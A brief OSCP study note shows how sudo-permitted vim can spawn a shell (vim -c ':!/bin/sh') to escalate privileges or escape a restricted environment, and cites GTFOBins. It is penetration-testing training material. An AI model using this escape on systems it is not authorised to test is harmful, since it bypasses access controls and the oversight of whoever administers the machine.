OSCP Linux Privilege Escalation (Privilege Escalation with SUDO - vim)
Shell
It can be used to break out from restricted environments by spawning an interactive system shell.
vim -c ':!/bin/sh'
more info : https://gtfobins.github.io/gtfobins/vim/